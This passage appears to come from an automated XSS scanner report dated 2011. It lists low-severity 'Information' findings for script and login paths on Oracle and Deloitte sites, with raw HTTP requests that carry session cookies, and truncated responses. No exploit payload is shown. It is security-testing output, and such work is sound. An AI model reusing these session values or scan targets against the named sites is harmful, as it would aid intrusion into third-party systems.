Referer: http://tag.admeld.com/ad/iframe/677/cnbc/728x90/atf?t=1315339058335&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fsearch.cnbc.com%2Fmain.do%3Fkeywords%3Dxss%26sort%3Ddate%26minimumrelevance%3D0.2%26layout%3Dblogpost%26pubtime%3D0%26pubfreq%3Dh
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PRID=FC84F463-F810-4805-B5C6-DA875B835084; PRbu=ErB40RtCA; PRvt=CBJ9xErENUwPwYAcUBBe; PRgo=BBBAAsJvBBVBF4FR; PRimp=47AC0400-D10A-9F5E-020A-1BB000220100; PRca=|AKln*9320:3|AKgy*39173:1|AKfq*9:2|AKcV*1774:3|#; PRcp=|AKlnAC0U:3|AKgyAKLp:1|AKfqAAQ0:1|AKfqAAAJ:1|AKcVAA2c:3|#; PRpl=|FrlJ:3|Fqr0:1|Fqqc:1|Fqqq:1|Fhqf:3|#; PRcr=|GW7X:3|GV2B:1|GV12:2|GSur:3|#; PRpc=|FrlJGW7X:3|Fqr0GV2B:1|FqqcGV12:1|FqqqGV12:1|FhqfGSur:3|#

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 06 Sep 2011 14:57:56 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NOI DSP COR PSAo PSDo OUR BUS OTC"
Cache-Control: no-cache

location.replace('http://www.cnbc.com/pointrollads.htm?pid=1398294N31620110830164853&redir=http://a1.interclick.com/icaid/192679/tid/ab3e2d1a-3dd3-4a1a-8843-31fbcc37982e/click.ic%3F$CTURL$&pub=IC13501
...[SNIP]...

32.2. https://login.oracle.com/mysso/sso_loginui/moc_lib.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://login.oracle.com
Path:	/mysso/sso_loginui/moc_lib.js

Request

Response

32.3. https://login.oracle.com/mysso/sso_loginui/sso_check.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://login.oracle.com
Path:	/mysso/sso_loginui/sso_check.js

Request

Response

32.4. https://login.oracle.com/oam/server/sso/auth_cred_submit previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://login.oracle.com
Path:	/oam/server/sso/auth_cred_submit

Request

Response

32.5. https://login.oracle.com/pls/orasso/orasso.wwsso_app_admin.ls_login previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://login.oracle.com
Path:	/pls/orasso/orasso.wwsso_app_admin.ls_login

Request

Response

32.6. http://www.deloitte.com/deloitte-portal-selfservice/jquery.showLoading.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.deloitte.com
Path:	/deloitte-portal-selfservice/jquery.showLoading.js

Request

GET /deloitte-portal-selfservice/jquery.showLoading.js HTTP/1.1
Host: www.deloitte.com
Proxy-Connection: keep-alive
Referer: http://www.deloitte.com/view/en_US/us/index.htm
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServerwww64.deloitte.com=17297418.36895.0000; JSESSIONID=NBNNTmCLThd2pH5RTrs1PgpT2wzvNpyyvTdRJRh8xF2yGQdwy2K9!-647124463

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Accept-Ranges: bytes
Last-Modified: Fri, 04 Mar 2011 03:11:48 GMT
X-Powered-By: Servlet/2.5 JSP/2.1
Date: Tue, 06 Sep 2011 15:56:57 GMT
Content-Length: 6553
Connection: close

/*
* jQuery showLoading plugin v1.0
*
* Copyright (c) 2009 Jim Keller
* Context - http://www.contextllc.com
*
* Dual licensed under the MIT and GPL licenses.
*
*/

jQuery.fn.showLo
...[SNIP]...

32.7. http://www.deloitte.com/deloitte-portal-selfservice/scripts/checkbox-style.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.deloitte.com
Path:	/deloitte-portal-selfservice/scripts/checkbox-style.js

Request

GET /deloitte-portal-selfservice/scripts/checkbox-style.js HTTP/1.1
Host: www.deloitte.com
Proxy-Connection: keep-alive
Referer: http://www.deloitte.com/view/en_US/us/index.htm
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServerwww64.deloitte.com=17297418.36895.0000; JSESSIONID=NBNNTmCLThd2pH5RTrs1PgpT2wzvNpyyvTdRJRh8xF2yGQdwy2K9!-647124463

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Accept-Ranges: bytes
Last-Modified: Fri, 04 Mar 2011 03:11:48 GMT
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Length: 3789
Date: Tue, 06 Sep 2011 15:56:57 GMT
Connection: close

var imgUncheckedSrc = '/deloitte-ecm-cm-dpm-web/images/contentdisplay/checkbox_unchecked.png';
var imgDiabledSrc = '/deloitte-ecm-cm-dpm-web/images/contentdisplay/checkbox_disabled.gif';
var imgChec
...[SNIP]...

32.8. http://www.deloitte.com/deloitte-portal-selfservice/selfservice-api.js previous

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.deloitte.com
Path:	/deloitte-portal-selfservice/selfservice-api.js

Request

GET /deloitte-portal-selfservice/selfservice-api.js HTTP/1.1
Host: www.deloitte.com
Proxy-Connection: keep-alive
Referer: http://www.deloitte.com/view/en_US/us/index.htm
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServerwww64.deloitte.com=17297418.36895.0000; JSESSIONID=NBNNTmCLThd2pH5RTrs1PgpT2wzvNpyyvTdRJRh8xF2yGQdwy2K9!-647124463

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Accept-Ranges: bytes
Last-Modified: Thu, 28 Apr 2011 08:09:06 GMT
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Length: 12899
Date: Tue, 06 Sep 2011 15:56:57 GMT
Connection: close

var myaccounturl= "";
var omnitureOut = "";

var closeModal = function() {
   $('#overlayMask').hide();
   $("#overlayRegion").hide();
   $("#overlayRegion").html("");
};

var openModal = functio
...[SNIP]...

Report generated by XSS.CX at Tue Sep 06 16:07:58 GMT-06:00 2011.